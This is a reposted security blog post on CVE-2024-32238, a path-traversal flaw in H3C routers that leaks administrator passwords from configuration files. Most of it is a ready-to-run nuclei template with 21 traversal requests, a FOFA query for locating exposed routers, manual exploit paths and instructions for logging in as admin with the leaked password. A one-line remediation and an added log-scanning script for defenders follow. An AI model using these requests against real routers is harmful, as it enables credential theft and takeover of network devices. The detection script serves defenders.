H3C Router userLogin.asp Password Information Disclosure Vulnerability (CVE-2024-32238) [Vulnerability Reproduction | nuclei PoC Included]

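admin, August 1, 2024, 11:49:32
Disclaimer: The content of this article is for technical study and reference only; do not use it for illegal or destructive purposes. Any direct or indirect consequences and losses caused by using the information or tools provided in this article are the sole responsibility of the user and have nothing to do with the author. If there is any infringement, please contact us for removal.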

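Vulnerability description:

userLogin.asp on H3C routers has a password information disclosure vulnerability (CVE-2024-32238). An attacker can exploit it to obtain the router's administrator account and password, which may allow further privilege escalation through the web management interface.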

01

Nuclei POC

```yaml
id: H3C-route-userlogin_asp-passwd-leak

info:
  name: H3C路由器userLogin.asp信息泄漏漏洞(CVE-2024-32238)
  author: kingkong
  severity: high
  metadata:
    fofa-query: app="H3C-Ent-Router"

# One request per model-specific configuration file name.
http:
  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../M60.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../GR8300.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../GR5200.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../GR3200.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../GR2200.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER6300G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER5200.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER5100.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3260G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3260.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3200G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3200.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3108GW.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3108G.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3100G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER3100.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

    # A hit on any response body containing "vtypasswd" marks the target as affected.
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1,"vtypasswd")'
          - 'contains(body_2,"vtypasswd")'
          - 'contains(body_3,"vtypasswd")'
          - 'contains(body_4,"vtypasswd")'
          - 'contains(body_5,"vtypasswd")'
          - 'contains(body_6,"vtypasswd")'
          - 'contains(body_7,"vtypasswd")'
          - 'contains(body_8,"vtypasswd")'
          - 'contains(body_9,"vtypasswd")'
          - 'contains(body_10,"vtypasswd")'
          - 'contains(body_11,"vtypasswd")'
          - 'contains(body_12,"vtypasswd")'
          - 'contains(body_13,"vtypasswd")'
          - 'contains(body_14,"vtypasswd")'
          - 'contains(body_15,"vtypasswd")'
          - 'contains(body_16,"vtypasswd")'
          - 'contains(body_17,"vtypasswd")'
          - 'contains(body_18,"vtypasswd")'
          - 'contains(body_19,"vtypasswd")'
          - 'contains(body_20,"vtypasswd")'
          - 'contains(body_21,"vtypasswd")'
```

02

Search syntax

FOFA:app="H3C-Ent-Router"


The interface looks like this:


03

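Vulnerability reproduction

If logging in with the account and password fails, use admin as the account instead; the password is the value after the vtypasswd parameter.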


Vulnerability detection PoC

```
GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1
Host:
User-Agent

# Replace the request path with one of the following
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
```

Screenshot of nuclei batch detection


04

Remediation

Apply the current system patches:

https://www.h3c.com/cn/
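
For defenders, the request shape shown above (userLogin.asp used as a path segment, followed by dot-segments that resolve to a `.cfg` file) can be searched for in access logs. The following is an added example, not code from the original post; it assumes a reverse proxy or sensor in front of the management interface that writes combined-format logs, and the sample log lines are constructed.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Combined-log-format fields we need: client, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2024:11:02:10 +0800] "GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1" 200 18342',
    '203.0.113.7 - - [01/Aug/2024:11:02:11 +0800] "GET /userLogin.asp/%2e%2e/actionpolicy_status/%2e%2e/M60.cfg HTTP/1.1" 404 0',
    '198.51.100.20 - - [01/Aug/2024:11:05:44 +0800] "GET /userLogin.asp HTTP/1.1" 200 5120',
    '198.51.100.20 - - [01/Aug/2024:11:05:50 +0800] "POST /userLogin.asp HTTP/1.1" 302 -',
]

def classify(target):
    """Return the resolved .cfg path if target has the CVE-2024-32238 request shape."""
    path = urlsplit(target).path
    for _ in range(2):  # decode twice so %2e%2e and %252e%252e count as ".."
        path = unquote(path)
    segments = path.replace("\\", "/").split("/")
    lowered = [s.lower() for s in segments]
    # userLogin.asp must appear as a segment with dot-segments after it.
    if "userlogin.asp" not in lowered:
        return None
    idx = lowered.index("userlogin.asp")
    if ".." not in segments[idx + 1:]:
        return None
    resolved = normpath("/" + "/".join(segments).lstrip("/"))
    return resolved if resolved.lower().endswith(".cfg") else None

def scan(lines):
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        resolved = classify(m["target"]) if m else None
        if resolved is None:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        # A 200 with a body suggests the configuration file was returned.
        leaked = m["status"] == "200" and size > 0
        findings.append({"client": m["client"], "file": resolved,
                         "severity": "likely-disclosure" if leaked else "attempt"})
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

This only works where the log records the request target as received, before any dot-segment normalization. A "likely-disclosure" finding means the stored administrator password should be treated as exposed and changed after patching.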

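Originally published on the WeChat official account 脚本小子: H3C Router userLogin.asp Password Information Disclosure Vulnerability (CVE-2024-32238) [Vulnerability Reproduction | nuclei PoC Included]

Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching only. Readers who put this information to other uses bear all legal and joint liability; this site bears no legal or joint liability. If you have any questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so the message is not blocked; contact details are on the home page).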
Please keep the link to this article when reposting (CN-SEC中文网: thanks to the original author for the hard work): http://cn-sec.com/archives/2990322.html